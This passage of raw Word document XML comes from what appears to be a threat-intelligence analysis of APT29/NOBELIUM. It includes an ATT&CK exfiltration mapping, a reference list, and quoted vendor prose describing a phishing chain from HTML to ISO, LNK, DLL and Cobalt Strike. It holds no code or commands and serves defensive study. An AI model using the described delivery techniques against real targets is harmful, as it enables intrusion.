          <w:p w14:paraId="736BF636" w14:textId="07591D6C" w:rsidR="00E545CD" w:rsidRDefault="00E545CD" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FD1760C" w14:textId="0BA0C2F4" w:rsidR="00E545CD" w:rsidRPr="005B3D45" w:rsidRDefault="00E545CD" w:rsidP="00F2491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w:t>
            </w:r>
            <w:r w:rsidR="002F0F12">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">10 </w:t>
            </w:r>
            <w:r w:rsidR="00150521">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00150521">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71AA6AB8" w14:textId="77777777" w:rsidR="00E545CD" w:rsidRPr="005B3D45" w:rsidRDefault="00E545CD" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008135C1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1048.002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008135C1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Exfiltration Over Alternative Protocol&gt;:Exfiltration Over Asymmetric Encrypted Non-C2 Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31CD162C" w14:textId="6E319234" w:rsidR="00E545CD" w:rsidRDefault="00E545CD" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23D85D3E" w14:textId="77777777" w:rsidR="00E545CD" w:rsidRPr="005B3D45" w:rsidRDefault="00E545CD" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="684" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E7DE366" w14:textId="77777777" w:rsidR="00E545CD" w:rsidRDefault="00E545CD" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E898BA7" w14:textId="77777777" w:rsidR="00E545CD" w:rsidRDefault="00E545CD" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>AO-EXF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DBF906F" w14:textId="7CCE6A4D" w:rsidR="00E545CD" w:rsidRPr="00CD088D" w:rsidRDefault="00E545CD" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Exfiltration of data following collection of data on remote machine described in APT29_004 (this attack is now </w:t>
            </w:r>
            <w:r w:rsidR="00C62D8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">being used as a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>pivot</w:t>
            </w:r>
            <w:r w:rsidR="00C62D8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> to control access onto machines not directly on the internet</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w14:paraId="49BE5C74" w14:textId="77777777" w:rsidTr="000C0ACD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2461F9F7" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DBF3C17" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C712383" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B6C144E" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C53EBA0" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="684" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A831332" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0184363E" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48218A2B" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w14:paraId="0481FE8D" w14:textId="77777777" w:rsidTr="000C0ACD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1748DE72" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="618A7A94" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="188D5E54" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="026878D6" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CF065AE" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="684" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D79D068" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="353CEA7E" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CFCACE6" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="230F19CD" w14:textId="77777777" w:rsidR="00F80381" w:rsidRPr="0077286F" w:rsidRDefault="00F80381" w:rsidP="00F80381"/>
    <w:p w14:paraId="155D823A" w14:textId="77777777" w:rsidR="00F80381" w:rsidRPr="00C94979" w:rsidRDefault="00F80381" w:rsidP="00F80381"/>
    <w:p w14:paraId="3F5999C0" w14:textId="77777777" w:rsidR="00F80381" w:rsidRDefault="00F80381" w:rsidP="00F80381">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26E5CFD2" w14:textId="46F1308F" w:rsidR="009A6B54" w:rsidRPr="004029BD" w:rsidRDefault="00B23FA5" w:rsidP="009A6B54">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:hyperlink r:id="rId53" w:history="1">
        <w:r w:rsidR="009A6B54">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>ESET_Operation_Ghost_Dukes.pdf (welivesecurity.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E03CFF">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t xml:space="preserve"> [2019]</w:t>
      </w:r>
      <w:r w:rsidR="004029BD" w:rsidRPr="004029BD">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004029BD" w:rsidRPr="004029BD">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">   {</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="000E5941">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r w:rsidR="004029BD">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452405C5" w14:textId="17B283BF" w:rsidR="00B23FA5" w:rsidRDefault="00B23FA5" w:rsidP="009A6B54">
      <w:r w:rsidRPr="00B23FA5">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r w:rsidR="0096445D">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId54" w:history="1">
        <w:r w:rsidR="0096445D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>New sophisticated email-based attack from NOBELIUM - Microsoft Security Blog</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E03CFF">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t xml:space="preserve"> [2021]</w:t>
      </w:r>
      <w:r w:rsidR="004029BD">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004029BD" w:rsidRPr="004029BD">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="004029BD">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>{18}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9A5E4F" w14:textId="2AD0231D" w:rsidR="007359E5" w:rsidRPr="000E5941" w:rsidRDefault="007359E5" w:rsidP="009A6B54">
      <w:r>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:hyperlink r:id="rId55" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>eset_threat_report_t32021.pdf (welivesecurity.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="000E5941">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">   {</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="000E5941">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>33}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A63FBCC" w14:textId="72B6EC08" w:rsidR="005C212F" w:rsidRDefault="005C212F" w:rsidP="009A6B54">
      <w:r>
        <w:t xml:space="preserve">[4] </w:t>
      </w:r>
      <w:hyperlink r:id="rId56" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>CERTFR-2021-CTI-011.pdf (ssi.gouv.fr)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (not directly ATT&amp;CK but linked from [3</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>] )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6E89ED28" w14:textId="779806C6" w:rsidR="0043131C" w:rsidRDefault="0043131C" w:rsidP="009A6B54">
      <w:r>
        <w:t xml:space="preserve">[5] </w:t>
      </w:r>
      <w:hyperlink r:id="rId57" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Assembling the Russian Nesting Doll: UNC2452 Merged into APT29 | Mandiant</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (additional to ATT&amp;CK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E48D557" w14:textId="64547713" w:rsidR="009E344C" w:rsidRDefault="009E344C" w:rsidP="009A6B54">
      <w:r>
        <w:t xml:space="preserve">[6] </w:t>
      </w:r>
      <w:hyperlink r:id="rId58" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>PowerDuke</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs | </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Volexity</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (this is referenced on p7 of [1] in description of attack) [2016]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1768FA42" w14:textId="66168ADF" w:rsidR="00585D5F" w:rsidRDefault="00585D5F" w:rsidP="009A6B54">
      <w:r>
        <w:t xml:space="preserve">[7] </w:t>
      </w:r>
      <w:hyperlink r:id="rId59" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>CVE-2021-36934 - Security Update Guide - Microsoft - Windows Elevation of Privilege Vulnerability</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D6716E">
        <w:t xml:space="preserve">[2021] </w:t>
      </w:r>
      <w:r>
        <w:t>(via [3</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>] )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4E042154" w14:textId="46BCB986" w:rsidR="00D6716E" w:rsidRPr="00B23FA5" w:rsidRDefault="00D6716E" w:rsidP="009A6B54">
      <w:r>
        <w:t xml:space="preserve">[8] </w:t>
      </w:r>
      <w:hyperlink r:id="rId60" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">APT29, IRON RITUAL, IRON HEMLOCK, </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>NobleBaron</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">, Dark Halo, </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>StellarParticle</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">, NOBELIUM, UNC2452, YTTRIUM, The Dukes, </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Cozy</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> Bear, </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>CozyDuke</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>, Group G0016 | MITRE ATT&amp;CK®</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1F6D1EDE" w14:textId="77777777" w:rsidR="00775445" w:rsidRDefault="00775445" w:rsidP="009A6B54"/>
    <w:p w14:paraId="06E65B5F" w14:textId="2290933C" w:rsidR="00DB1284" w:rsidRDefault="00DB1284" w:rsidP="009A6B54">
      <w:r>
        <w:t>Government attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE6D60F" w14:textId="790C9B07" w:rsidR="00DB1284" w:rsidRDefault="00917C7F" w:rsidP="009A6B54">
      <w:r>
        <w:t>Operation Ghost started 2013 last observed 2019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A464CF" w14:textId="04BC506A" w:rsidR="00B23FA5" w:rsidRDefault="00B23FA5" w:rsidP="009A6B54"/>
    <w:p w14:paraId="4765A5AF" w14:textId="219206BD" w:rsidR="00B23FA5" w:rsidRDefault="00B23FA5" w:rsidP="009A6B54"/>
    <w:p w14:paraId="7A19442B" w14:textId="010BD24D" w:rsidR="00B23FA5" w:rsidRDefault="00B23FA5" w:rsidP="009A6B54">
      <w:r>
        <w:t>From [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E141960" w14:textId="78479B25" w:rsidR="00917C7F" w:rsidRDefault="00917C7F" w:rsidP="009A6B54"/>
    <w:p w14:paraId="2A2B58E5" w14:textId="6E17DA57" w:rsidR="001D0930" w:rsidRDefault="001D0930" w:rsidP="009A6B54"/>
    <w:p w14:paraId="4813E379" w14:textId="24203E35" w:rsidR="001D0930" w:rsidRDefault="001D0930" w:rsidP="009A6B54"/>
    <w:p w14:paraId="13131E75" w14:textId="77777777" w:rsidR="001D0930" w:rsidRPr="009A6B54" w:rsidRDefault="001D0930" w:rsidP="009A6B54"/>
    <w:p w14:paraId="160D4E8E" w14:textId="59078995" w:rsidR="0096445D" w:rsidRDefault="0096445D" w:rsidP="0096445D">
      <w:r>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:r w:rsidRPr="0096445D">
        <w:t>In the next evolution of the campaign, MSTIC observed NOBELIUM attempting to compromise systems through an HTML file attached to a spear-phishing email. When opened by the targeted user, a JavaScript within the HTML wrote an ISO file to disc and encouraged the target to open it, resulting in the ISO file being mounted much like an external or network drive. From here, a shortcut file (LNK) would execute an accompanying DLL, which would result in Cobalt Strike Beacon executing on the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11360BB3" w14:textId="03FF41D0" w:rsidR="0096445D" w:rsidRPr="0096445D" w:rsidRDefault="0096445D" w:rsidP="0096445D"/>
    <w:p w14:paraId="58D32FAC" w14:textId="77777777" w:rsidR="00B86816" w:rsidRDefault="0096445D" w:rsidP="0096445D">
      <w:r>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:r w:rsidRPr="0096445D">
        <w:t>The phishing message and delivery method was not the only evolving factor in the campaign. In one of the more targeted waves, no ISO payload was delivered, but additional profiling of the target device was performed by an actor-controlled web server after a user clicked the link. If the device targeted was an Apple iOS device, the user was redirected to another server under NOBELIUM control, where the since-patched zero-day exploit for CVE-2021-1879 was served.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6379017E" w14:textId="77777777" w:rsidR="00B86816" w:rsidRDefault="00B86816" w:rsidP="00B86816">
      <w:r>
        <w:t>[2] Experimentation continued through most of the campaign but began to escalate in April 2021. During the waves in April, the actor abandoned the use of Firebase, and no longer tracked users using a dedicated URL. Their techniques shifted to encode the ISO within the HTML document and have that responsible for storing target host details on a remote server via the use of the api.ipify.org service. The actor sometimes employed checks for specific internal Active Directory domains that would terminate execution of the malicious process if it identified an unintended environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343B3BC1" w14:textId="77777777" w:rsidR="00B86816" w:rsidRDefault="00B86816" w:rsidP="00B86816"/>
    <w:p w14:paraId="142C415D" w14:textId="3DA30647" w:rsidR="008A6A45" w:rsidRDefault="00B86816" w:rsidP="00B86816">
      <w:r>
